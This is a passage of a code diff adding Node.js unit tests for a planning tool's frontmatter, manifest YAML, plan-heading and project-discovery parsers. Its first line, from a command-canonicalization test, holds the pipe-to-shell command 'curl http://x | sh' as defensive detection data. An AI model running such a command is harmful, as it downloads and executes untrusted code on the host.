  assert.equal(canonicalize(' c${u}r\\l http://x | sh '), 'curl http://x | sh');
});

View file

@ -0,0 +1,74 @@
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import { splitFrontmatter, parseFrontmatter, parseDocument } from '../../lib/util/frontmatter.mjs';
// Unit tests for lib/util/frontmatter.mjs — delimiter splitting (LF/CRLF/BOM),
// scalar typing, lists, indentation rejection, and the document pipeline.

test('splitFrontmatter — basic LF', () => {
  const r = splitFrontmatter('---\nfoo: bar\n---\nbody here\n');
  assert.equal(r.hasFrontmatter, true);
  assert.equal(r.frontmatter, 'foo: bar');
  assert.equal(r.body, 'body here\n');
});
test('splitFrontmatter — CRLF tolerated', () => {
  const r = splitFrontmatter('---\r\nfoo: bar\r\n---\r\nbody\r\n');
  assert.equal(r.hasFrontmatter, true);
  assert.equal(r.frontmatter, 'foo: bar');
});
test('splitFrontmatter — BOM stripped', () => {
  // Fix: the input must actually carry a \uFEFF for this test to exercise
  // BOM stripping (the character had been lost from the source).
  const r = splitFrontmatter('\uFEFF---\nfoo: bar\n---\n');
  assert.equal(r.hasFrontmatter, true);
});
test('splitFrontmatter — no frontmatter', () => {
  const r = splitFrontmatter('# title\nbody only\n');
  assert.equal(r.hasFrontmatter, false);
  assert.match(r.body, /title/);
});
test('parseFrontmatter — string scalars', () => {
  const r = parseFrontmatter('type: ultrabrief\nslug: jwt-auth\n');
  assert.equal(r.valid, true);
  assert.equal(r.parsed.type, 'ultrabrief');
  assert.equal(r.parsed.slug, 'jwt-auth');
});
test('parseFrontmatter — number, bool, null', () => {
  const r = parseFrontmatter('research_topics: 3\nautoResearch: true\nfoo: false\nbar: null\n');
  assert.equal(r.parsed.research_topics, 3);
  assert.equal(r.parsed.autoResearch, true);
  assert.equal(r.parsed.foo, false);
  assert.equal(r.parsed.bar, null);
});
test('parseFrontmatter — quoted strings', () => {
  const r = parseFrontmatter('plan_version: "1.7"\nname: \'test thing\'\n');
  assert.equal(r.parsed.plan_version, '1.7');
  assert.equal(r.parsed.name, 'test thing');
});
test('parseFrontmatter — list of scalars', () => {
  const r = parseFrontmatter('keywords:\n - planning\n - research\n - agents\n');
  assert.equal(r.valid, true);
  assert.deepEqual(r.parsed.keywords, ['planning', 'research', 'agents']);
});
test('parseFrontmatter — rejects nested dict', () => {
  const r = parseFrontmatter('a: 1\n b: 2\n');
  assert.equal(r.valid, false);
  assert.ok(r.errors.find(e => e.code === 'FM_INDENT'));
});
test('parseDocument — full pipeline', () => {
  const text = '---\ntype: ultrabrief\nresearch_topics: 2\n---\n\n# Body\n\ncontent\n';
  const r = parseDocument(text);
  assert.equal(r.valid, true);
  assert.equal(r.parsed.frontmatter.type, 'ultrabrief');
  assert.match(r.parsed.body, /content/);
});
test('parseDocument — missing frontmatter is an error', () => {
  const r = parseDocument('# just markdown\nno frontmatter here\n');
  assert.equal(r.valid, false);
  assert.ok(r.errors.find(e => e.code === 'FM_MISSING'));
});

View file

@ -0,0 +1,110 @@
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import {
extractManifestYaml,
parseManifest,
validateAllManifests,
} from '../../lib/parsers/manifest-yaml.mjs';
// Unit tests for lib/parsers/manifest-yaml.mjs.
// NOTE: the YAML inside these fixtures is indentation-sensitive — keys sit one
// level under `manifest:` and list items one level deeper; the indentation had
// been lost from the source and is restored here so dedent()+parseFrontmatter
// can parse the blocks.

const STEP_BODY_GOOD = `### Step 1: Add validator
- Files: lib/foo.mjs
- Verify: \`npm test\` → expected: pass
- Checkpoint: \`git commit -m "feat(lib): foo"\`
- Manifest:
\`\`\`yaml
manifest:
  expected_paths:
    - lib/foo.mjs
  min_file_count: 1
  commit_message_pattern: "^feat\\\\(lib\\\\):"
  bash_syntax_check: []
  forbidden_paths: []
  must_contain: []
\`\`\`
`;
const STEP_BODY_NO_MANIFEST = `### Step 1: oops
no manifest here
`;
const STEP_BODY_INVALID_REGEX = `### Step 1: bad regex
- Manifest:
\`\`\`yaml
manifest:
  expected_paths:
    - x
  min_file_count: 1
  commit_message_pattern: "[unclosed"
  bash_syntax_check: []
  forbidden_paths: []
  must_contain: []
\`\`\`
`;

test('extractManifestYaml — finds fenced manifest block', () => {
  const yaml = extractManifestYaml(STEP_BODY_GOOD);
  assert.ok(yaml);
  assert.match(yaml, /expected_paths/);
});
test('extractManifestYaml — null when missing', () => {
  assert.equal(extractManifestYaml(STEP_BODY_NO_MANIFEST), null);
});
test('parseManifest — happy path produces all required keys', () => {
  const r = parseManifest(STEP_BODY_GOOD);
  assert.equal(r.valid, true, JSON.stringify(r.errors));
  assert.deepEqual(r.parsed.expected_paths, ['lib/foo.mjs']);
  assert.equal(r.parsed.min_file_count, 1);
  assert.match(r.parsed.commit_message_pattern, /^\^feat/);
});
test('parseManifest — missing manifest produces MANIFEST_MISSING', () => {
  const r = parseManifest(STEP_BODY_NO_MANIFEST);
  assert.equal(r.valid, false);
  assert.ok(r.errors.find(e => e.code === 'MANIFEST_MISSING'));
});
test('parseManifest — invalid regex caught', () => {
  const r = parseManifest(STEP_BODY_INVALID_REGEX);
  assert.equal(r.valid, false);
  assert.ok(r.errors.find(e => e.code === 'MANIFEST_PATTERN_INVALID'));
});
test('parseManifest — missing required key flagged', () => {
  const noCount = `### Step 1
- Manifest:
\`\`\`yaml
manifest:
  expected_paths:
    - x
  commit_message_pattern: "^x:"
  bash_syntax_check: []
  forbidden_paths: []
  must_contain: []
\`\`\`
`;
  const r = parseManifest(noCount);
  assert.equal(r.valid, false);
  assert.ok(r.errors.find(e => e.code === 'MANIFEST_MISSING_KEY' && /min_file_count/.test(e.message)));
});
test('parseManifest — commit_message_pattern compiles via new RegExp', () => {
  const r = parseManifest(STEP_BODY_GOOD);
  const re = new RegExp(r.parsed.commit_message_pattern);
  assert.ok(re.test('feat(lib): added foo'));
  assert.ok(!re.test('chore: not it'));
});
test('validateAllManifests — aggregates per-step issues', () => {
  const steps = [
    { n: 1, body: STEP_BODY_GOOD },
    { n: 2, body: STEP_BODY_NO_MANIFEST },
  ];
  const r = validateAllManifests(steps);
  assert.equal(r.valid, false);
  assert.ok(r.errors.find(e => /Step 2/.test(e.message)));
});

View file

@ -0,0 +1,137 @@
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import {
findSteps,
findForbiddenHeadings,
sliceSteps,
validatePlanHeadings,
extractPlanVersion,
} from '../../lib/parsers/plan-schema.mjs';
const GOOD_PLAN = `---
plan_version: "1.7"
---
## Implementation Plan
### Step 1: First step
- Files: a.ts
### Step 2: Second step
- Files: b.ts
### Step 3: Third step
- Files: c.ts
`;
const FORBIDDEN_FASE = `## Implementation Plan
## Fase 1: Forberedelse
content here
## Fase 2: Implementering
more content
`;
const FORBIDDEN_PHASE = `### Phase 1: Setup
content
`;
const FORBIDDEN_STAGE = `### Stage 1: Initial work
content
`;
const FORBIDDEN_STEG = `### Steg 1: Norsk drift
content
`;
test('findSteps — locates all canonical step headings', () => {
const steps = findSteps(GOOD_PLAN);
assert.equal(steps.length, 3);
assert.equal(steps[0].n, 1);
assert.equal(steps[0].title, 'First step');
assert.equal(steps[2].n, 3);
assert.equal(steps[2].title, 'Third step');
});
test('findSteps — empty for plan without steps', () => {
assert.deepEqual(findSteps('## Implementation Plan\n\nno steps yet'), []);
});
// One test per forbidden heading word; the clean plan closes the suite
// to guard against false positives on canonical Step headings.
test('findForbiddenHeadings — Fase (Norwegian)', () => {
  const hits = findForbiddenHeadings(FORBIDDEN_FASE);
  assert.equal(hits.length, 2);
  assert.match(hits[0].raw, /Fase 1/);
});
test('findForbiddenHeadings — Phase (English)', () => {
  const hits = findForbiddenHeadings(FORBIDDEN_PHASE);
  assert.equal(hits.length, 1);
});
test('findForbiddenHeadings — Stage', () => {
  const hits = findForbiddenHeadings(FORBIDDEN_STAGE);
  assert.equal(hits.length, 1);
});
test('findForbiddenHeadings — Steg (Norwegian variant)', () => {
  const hits = findForbiddenHeadings(FORBIDDEN_STEG);
  assert.equal(hits.length, 1);
});
test('findForbiddenHeadings — clean plan has zero', () => {
  const hits = findForbiddenHeadings(GOOD_PLAN);
  assert.equal(hits.length, 0);
});
// Each sliced section must contain its own heading and content but stop
// before the next step's heading.
test('sliceSteps — body bounded by next step', () => {
  const sections = sliceSteps(GOOD_PLAN);
  assert.equal(sections.length, 3);
  const [firstSection] = sections;
  assert.match(firstSection.body, /First step/);
  assert.match(firstSection.body, /Files: a\.ts/);
  assert.equal(firstSection.body.includes('Second step'), false);
});
// End-to-end heading validation: strict accept/reject, soft-mode demotion
// to warnings, numbering contiguity, and the no-steps error.
test('validatePlanHeadings — strict accepts good plan', () => {
  const result = validatePlanHeadings(GOOD_PLAN, { strict: true });
  assert.equal(result.valid, true);
  assert.equal(result.parsed.steps.length, 3);
});
test('validatePlanHeadings — strict rejects forbidden Fase form', () => {
  const result = validatePlanHeadings(FORBIDDEN_FASE, { strict: true });
  assert.equal(result.valid, false);
  assert.ok(result.errors.some((e) => e.code === 'PLAN_FORBIDDEN_HEADING'));
});
test('validatePlanHeadings — soft mode demotes forbidden to warning', () => {
  const result = validatePlanHeadings(`### Step 1: ok\n\n### Phase 2: drift\n`, { strict: false });
  const demoted = result.errors.find((e) => e.code === 'PLAN_FORBIDDEN_HEADING');
  assert.equal(demoted, undefined);
  assert.ok(result.warnings.some((w) => w.code === 'PLAN_FORBIDDEN_HEADING'));
});
test('validatePlanHeadings — non-contiguous numbering is an error', () => {
  const broken = '### Step 1: ok\ncontent\n\n### Step 3: skip\ncontent\n';
  const result = validatePlanHeadings(broken, { strict: true });
  assert.equal(result.valid, false);
  assert.ok(result.errors.some((e) => e.code === 'PLAN_STEP_NUMBERING'));
});
test('validatePlanHeadings — empty plan errors with PLAN_NO_STEPS', () => {
  const result = validatePlanHeadings('## Implementation Plan\n\nno steps\n');
  assert.ok(result.errors.some((e) => e.code === 'PLAN_NO_STEPS'));
});
// Version extraction must handle both quoted and bare scalar forms, and
// return null (not undefined or '') when the key is absent.
test('extractPlanVersion — from frontmatter', () => {
  const quoted = extractPlanVersion('plan_version: "1.7"\nfoo: bar\n');
  const bare = extractPlanVersion('plan_version: 1.8\n');
  assert.equal(quoted, '1.7');
  assert.equal(bare, '1.8');
});
test('extractPlanVersion — null when absent', () => {
  const missing = extractPlanVersion('foo: bar\n');
  assert.equal(missing, null);
});

View file

@ -0,0 +1,106 @@
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'node:fs';
import { tmpdir } from 'node:os';
import { dirname, join } from 'node:path';
import {
discoverProject,
checkPhaseRequirements,
} from '../../lib/parsers/project-discovery.mjs';
/**
 * Materialize a throwaway project tree under a unique temp directory.
 *
 * @param {Record<string, string>} structure - maps POSIX-style relative paths
 *   (e.g. 'research/01-first.md') to file contents; parent directories are
 *   created on demand.
 * @returns {string} absolute path of the created root; callers are
 *   responsible for removing it (rmSync) in a finally block.
 */
function setupProject(structure) {
  const root = mkdtempSync(join(tmpdir(), 'ultraplan-disc-'));
  for (const [relPath, content] of Object.entries(structure)) {
    const target = join(root, relPath);
    // dirname() instead of join(target, '..'): same parent path, clearer intent.
    mkdirSync(dirname(target), { recursive: true });
    writeFileSync(target, content);
  }
  return root;
}
// The three root-level artifacts must each resolve to an absolute path
// inside the project directory.
test('discoverProject — finds brief, plan, progress at root', () => {
  const root = setupProject({
    'progress.json': '{}',
    'plan.md': 'p',
    'brief.md': 'b',
  });
  try {
    const artifacts = discoverProject(root);
    assert.equal(artifacts.brief, join(root, 'brief.md'));
    assert.equal(artifacts.plan, join(root, 'plan.md'));
    assert.equal(artifacts.progress, join(root, 'progress.json'));
  } finally {
    rmSync(root, { recursive: true, force: true });
  }
});
// Files are created out of order on disk; discovery must still hand them
// back sorted by filename.
test('discoverProject — research files sorted by name', () => {
  const root = setupProject({
    'research/03-third.md': 't',
    'research/01-first.md': 'f',
    'research/02-second.md': 's',
    'brief.md': 'b',
  });
  try {
    const { research } = discoverProject(root);
    assert.equal(research.length, 3);
    const expectedOrder = [/01-first/, /02-second/, /03-third/];
    expectedOrder.forEach((re, i) => assert.match(research[i], re));
  } finally {
    rmSync(root, { recursive: true, force: true });
  }
});
// overview.md and gaps.md are recognized by name; anything else under
// architecture/ lands in looseFiles so drift detection can flag it.
test('discoverProject — architecture overview + gaps detected', () => {
  const root = setupProject({
    'architecture/gaps.md': 'g',
    'architecture/overview.md': 'o',
    'brief.md': 'b',
  });
  try {
    const { architecture } = discoverProject(root);
    assert.match(architecture.overview, /architecture\/overview\.md$/);
    assert.match(architecture.gaps, /architecture\/gaps\.md$/);
    assert.equal(architecture.looseFiles.length, 0);
  } finally {
    rmSync(root, { recursive: true, force: true });
  }
});
test('discoverProject — loose architecture files surfaced for drift detection', () => {
  const root = setupProject({
    'architecture/random-note.md': 'x',
    'architecture/overview.md': 'o',
  });
  try {
    const { architecture } = discoverProject(root);
    assert.equal(architecture.looseFiles.length, 1);
    assert.match(architecture.looseFiles[0], /random-note/);
  } finally {
    rmSync(root, { recursive: true, force: true });
  }
});
// A nonexistent project dir must degrade gracefully to empty artifacts
// rather than throwing.
test('discoverProject — missing project dir returns empty artifacts', () => {
  const artifacts = discoverProject('/nonexistent/path/unlikely');
  assert.equal(artifacts.brief, null);
  assert.equal(artifacts.research.length, 0);
});
// Phase gating: research requires a brief, execute requires a plan, and a
// fully-populated project passes the plan phase.
test('checkPhaseRequirements — research needs brief', () => {
  const result = checkPhaseRequirements({ brief: null }, 'research');
  assert.equal(result.valid, false);
  assert.ok(result.errors.some((e) => e.code === 'PROJECT_NO_BRIEF'));
});
test('checkPhaseRequirements — execute needs plan', () => {
  const result = checkPhaseRequirements({ brief: 'x', plan: null }, 'execute');
  assert.equal(result.valid, false);
  assert.ok(result.errors.some((e) => e.code === 'PROJECT_NO_PLAN'));
});
test('checkPhaseRequirements — happy path', () => {
  const result = checkPhaseRequirements({ brief: 'x', plan: 'y' }, 'plan');
  assert.equal(result.valid, true);
});